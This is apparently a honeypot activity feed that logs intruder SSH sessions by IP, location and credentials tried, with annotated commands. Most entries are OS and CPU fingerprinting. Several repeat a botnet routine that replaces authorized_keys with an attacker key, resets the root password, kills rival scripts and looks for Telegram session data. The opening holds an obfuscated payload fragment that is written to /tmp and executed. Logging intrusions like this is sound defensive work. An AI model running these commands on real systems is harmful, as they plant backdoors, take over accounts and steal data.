KUloWATOKeF3Kbs6PqQ1d+Ei2QJWbUlcW0doVwbOKuN1Kbg8PrA/dOUrwAZYakdaW0drUQbOKuNzPbI9OLondOcuzg9Zd1BGWVlvWw7YL+dlM78mML0pd+QvzgZZbVNQX19tQQbSLf50N70mO7spc+Ei2QVWbElZUF93UwTXNuF1MaQ6Obs9c+Ap0AJBYUdZXl93UATRNuF8M7A+PLIwZeIq0BlQYVlGUVB3VgbaLuB0N78oPL0pd+QqzgVTaEdZX1ljWAHVK/B9M6Q7PqQ2d+A21ANbYV9QUUlrUA/OIeBrNbk9Jr8/f+Yo0QdUeVhcXEdqUBnRLeFrNbs7Mrw+feU40QJVd1FbRltoUBnSK+pzNLk+KL4wa+Is0hlUYUdQXFNvUQbQIfB0MqQ6OL4pd+MuzgNUY15aWFh5UAXUNuJ3NaQ8Jrs+dOov0wVVeV1fRlttUxnRKOhrMLsyPro2dec41AJPYV5GWl1uTwbYLOp9MLw8KL4+a+Ir0hlTaVhGWllpWw7VL+FlNrs8Jrg1ff4p0w5Pb11SX11uVRfRKulrNbo8Jrsxa+Er0w1Xb1FZSF1gTwXTKv53Nb4mOb83f+gp1ABBbV5GWl1rTwXSKf50MLoyMbwydvAs1xlTbFlGWV9tTwbZIep9ML49KLs3c/4v1BlTaEdaW15jVwfRKOVlNro+Jrs0a+IrzgZVYFNeUFhgQQPZNuJ2NaQ6PL8pfOIi1gRRbUlZUVp3UwTOKuB0Kbg7PrA/cOAowAZZb0daW153UAfWNuJ0NrA+OLs3cDIthesEq1Rhi94jiICp2c6xTEszitxEWnpi; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/xIwlr71hOZ && /tmp/xIwlr71hOZ KUloWATOKeF3Kbs6PqQ1d+Ei2QJWbUlcW0doVwbOKuN1Kbg8PrA/dOUrwAZYakdaW0drUQbOKuNzPbI9OLondOcuzg9Zd1BGWVlvWw7YL+dlM78mML0pd+QvzgZZbVNQX19tQQbSLf50N70mO7spc+Ei2QVWbElZUF93UwTXNuF1MaQ6Obs9c+Ap0AJBYUdZXl93UATRNuF8M7A+PLIwZeIq0BlQYVlGUVB3VgbaLuB0N78oPL0pd+QqzgVTaEdZX1ljWAHVK/B9M6Q7PqQ2d+A21ANbYV9QUUlrUA/OIeBrNbk9Jr8/f+Yo0QdUeVhcXEdqUBnRLeFrNbs7Mrw+feU40QJVd1FbRltoUBnSK+pzNLk+KL4wa+Is0hlUYUdQXFNvUQbQIfB0MqQ6OL4pd+MuzgNUY15aWFh5UAXUNuJ3NaQ8Jrs+dOov0wVVeV1fRlttUxnRKOhrMLsyPro2dec41AJPYV5GWl1uTwbYLOp9MLw8KL4+a+Ir0hlTaVhGWllpWw7VL+FlNrs8Jrg1ff4p0w5Pb11SX11uVRfRKulrNbo8Jrsxa+Er0w1Xb1FZSF1gTwXTKv53Nb4mOb83f+gp1ABBbV5GWl1rTwXSKf50MLoyMbwydvAs1xlTbFlGWV9tTwbZIep9ML49KLs3c/4v1BlTaEdaW15jVwfRKOVlNro+Jrs0a+IrzgZVYFNeUFhgQQPZNuJ2NaQ6PL8pfOIi1gRRbUlZUVp3UwTOKuB0Kbg7PrA/cOAowAZZb0daW153UAfWNuJ0NrA+OLs3cDIthesEq1Rhi94jiICp2c6xTEszitxEWnpi" &

↳ payload download from C2

$ head -c 3716336 > /tmp/wwLXu23ttn

↳ execute from /tmp

$ echo 1 > /dev/null && cat /bin/echoQtd#0000

$ >A@/`'8

🎭 fjord_root (85.225.15.215) — Lund, Sweden · 1 session · 9 cmds

2026-04-27 11:48 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 fog_root_4 (212.116.231.23) — London, United Kingdom · 15 sessions · 15 cmds

2026-04-27 10:51 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×15

🎭 dragon_root_4 (120.76.202.208) — Shenzhen, China · 1 session · 1 cmd

2026-04-27 09:14 EDT · as user/user

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 rogue_root_29 (144.2.91.96) — Solothurn, Switzerland · 3 sessions · 19 cmds

2026-04-09 19:11 EDT · as root/root, ubuntu/ubuntu

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print ×2

$ ifconfig ×2

↳ network mapping

$ uname -a ×3

↳ OS/kernel identification

$ cat /proc/cpuinfo ×2

↳ CPU profiling

$ ps | grep '[Mm]iner' ×2

$ ps -ef | grep '[Mm]iner' ×2

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ×2

$ locate D877F783D5D3EF8Cs ×2

$ echo Hi | cat -n ×2

🎭 tulip_sol_3 (80.94.92.182) — Amsterdam, The Netherlands · 178 sessions · 178 cmds

2026-03-01 08:32 EST · as firedancer/firedancer, raydium/raydium, sol/123

Ran uname 58x across 58 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×178

↳ obfuscated system check

🎭 dragon_root_5 (8.155.60.99) — Shenzhen, China · 1 session · 1 cmd

2026-04-27 07:38 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_38 (103.149.86.208) — Ho Chi Minh City, Vietnam · 1 session · 1 cmd

2026-04-27 07:28 EDT · as admin/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 silk_db (59.110.37.122) — Beijing, China · 1 session · 1 cmd

2026-04-27 05:15 EDT · as oracle/oracle

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 tulip_sol_6 (192.109.200.237) — Eygelshoven, The Netherlands · 35 sessions · 35 cmds

2026-04-27 04:14 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 4x across 4 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 gouda_sol_5 (80.94.92.186) — Amsterdam, The Netherlands · 255 sessions · 255 cmds

2026-03-06 10:47 EST · as eth/eth, sol/123, sol/12345678

Ran uname 85x across 85 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×255

↳ obfuscated system check

🎭 jade_root_4 (121.196.227.86) — Hangzhou, China · 2 sessions · 2 cmds

2026-04-23 03:57 EDT · as pi/raspberry, user/user

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 toque_root_2 (68.183.204.19) — Toronto, Canada · 1 session · 1 cmd

2026-04-26 23:28 EDT · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 stein_root_14 (80.158.109.51) — Hanover, Germany · 1 session · 2 cmds

2026-04-26 22:30 EDT · as oracle/Founderbn

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wok_root_3 (8.136.223.13) — Hangzhou, China · 1 session · 1 cmd

2026-04-26 21:11 EDT · as oracle/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 gouda_sol_3 (45.148.10.183) — Amsterdam, The Netherlands · 334 sessions · 334 cmds

2026-04-07 08:02 EDT · as admin/password, bitcoin/bitcoin, eth/eth

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×334

↳ obfuscated system check

🎭 wraith_root_25 (8.217.201.158) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-26 18:50 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 panda (47.96.71.48) — Hangzhou, China · 1 session · 1 cmd

2026-04-26 18:21 EDT · as test/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 lantern_root_3 (47.98.244.82) — Hangzhou, China · 3 sessions · 3 cmds

2026-04-12 13:45 EDT · as admin/admin, admin/admin123, oracle/oracle123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×3

↳ OS/kernel identification

🎭 wok_root_4 (47.112.97.49) — Shenzhen, China · 1 session · 1 cmd

2026-04-26 17:17 EDT · as test/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 tulip_root_3 (192.109.200.50) — Eygelshoven, The Netherlands · 12 sessions · 12 cmds

2026-04-26 15:40 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×12

🎭 panda_2 (182.92.133.114) — Beijing, China · 1 session · 1 cmd

2026-04-26 13:28 EDT · as test/test

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 cipher_root_36 (23.97.62.148) — Singapore, Singapore · 1 session · 1 cmd

2026-04-26 13:22 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 tulip_sol_7 (193.32.162.145) — Amsterdam, The Netherlands · 74 sessions · 74 cmds

2026-03-01 14:47 EST · as jito/jito, raydium/raydium, sol/sol

Ran uname 71x across 71 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×74

↳ obfuscated system check

🎭 cipher_root_37 (151.115.164.231) — Milan, Italy · 13 sessions · 13 cmds

2026-04-26 10:18 EDT · as admin/123456, admin/admin, admin/password

Ran uname 13x across 13 sessions — automated OS fingerprinting.

$ uname -a ; echo 'vT' ×13

🎭 wraith_root_26 (151.115.106.239) — Warsaw, Poland · 13 sessions · 13 cmds

2026-04-26 09:13 EDT · as admin/123456, admin/admin, admin/password

Ran uname 13x across 13 sessions — automated OS fingerprinting.

$ uname -a ; echo 'vT' ×13

🎭 stroopwafel_root_4 (89.190.156.119) — Amsterdam, Netherlands · 1 session · 19 cmds

2026-04-26 08:58 EDT · as root/admin123

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:7uNIZhfKSMD3"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 rogue_root_30 (45.78.208.179) — Singapore, Singapore · 1 session · 19 cmds

2026-04-26 08:12 EDT · as root/admin123

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:9MYc0ITwII1k"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wok_root_5 (123.57.73.112) — Beijing, China · 1 session · 1 cmd

2026-04-26 07:41 EDT · as test/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 tsar_root_3 (90.156.149.25) — Moscow, Russia · 1 session · 19 cmds

2026-04-26 07:41 EDT · as root/admin123

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:ak46WAnk2Ajm"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 ghost_root_39 (43.99.66.254) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-26 07:02 EDT · as oracle/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 wraith_root_27 (203.205.37.233) — Ho Chi Minh City, Vietnam · 1 session · 2 cmds

2026-04-26 06:15 EDT · as oracle/oracle!@#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wraith_sol_2 (186.68.83.105) — La Puntilla, Ecuador · 2 sessions · 21 cmds

2026-04-18 05:27 EDT · as oracle/oracle!@#, root/admin123

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:YAobszDWatUc"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wraith_root_28 (180.241.196.139) — Banjarnegara, Indonesia · 1 session · 2 cmds

2026-04-26 03:53 EDT · as oracle/oracle27

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 steppe_root (109.73.203.168) — Moscow, Russia · 35 sessions · 35 cmds

2026-04-26 00:53 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 cipher_root_7 (103.146.202.84) — Cicurug, Indonesia · 24 sessions · 24 cmds

2026-04-12 01:50 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 7x across 7 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×24

🎭 wok_root_6 (116.177.172.108) — Jinrongjie, China · 1 session · 1 cmd

2026-04-26 00:57 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 poutine_root_2 (192.99.169.99) — Beauharnois, Canada · 3 sessions · 24 cmds

2026-04-16 07:09 EDT · as oracle/Oracle10, oracle/Oracle17, user/user

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\nbRkjdCbBq03y\nbRkjdCbBq03y"|passwd|bash

$ Enter new UNIX password:

$ echo "user\nbRkjdCbBq03y\nbRkjdCbBq03y\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cipher_root_38 (219.78.63.235) — Central, Hong Kong · 1 session · 9 cmds

2026-04-25 21:10 EDT · as root/root

root/root login → /ip cloud print network topology → ifconfig interface enumeration → uname -a OS fingerprinting → cat /proc/cpuinfo hardware profiling → ps grep miner process detection → Telegram data directory reconnaissance → locate specific hash scan → echo Hi command execution

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 wok_root_7 (101.126.54.245) — Chaowai, China · 1 session · 1 cmd

2026-04-25 20:32 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 carnival_root (170.233.151.14) — Marabá, Brazil · 2 sessions · 21 cmds

2026-03-26 18:00 EDT · as oracle/oracle02!, root/qwerty

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:MVwWX48LUHSP"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 liberty_sol_2 (87.121.84.41) — Los Angeles, United States · 13 sessions · 13 cmds

2026-04-25 17:26 EDT · as admin/admin, deploy/deploy, guest/guest

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×13

🎭 panda_root (47.112.121.84) — Shenzhen, China · 2 sessions · 2 cmds

2026-04-25 16:07 EDT · as oracle/oracle, ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 phantom_root_16 (171.244.37.96) — Hanoi, Vietnam · 1 session · 20 cmds

2026-04-25 17:00 EDT · as user/user

SSH brute-force with hardcoded password → disable read-only attribute on .ssh → purge and recreate .ssh directory → verify CPU model and count cores → audit memory usage → inspect ls binary hash → check existing crontab → confirm architecture via uname → profile hardware for mining viability.

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

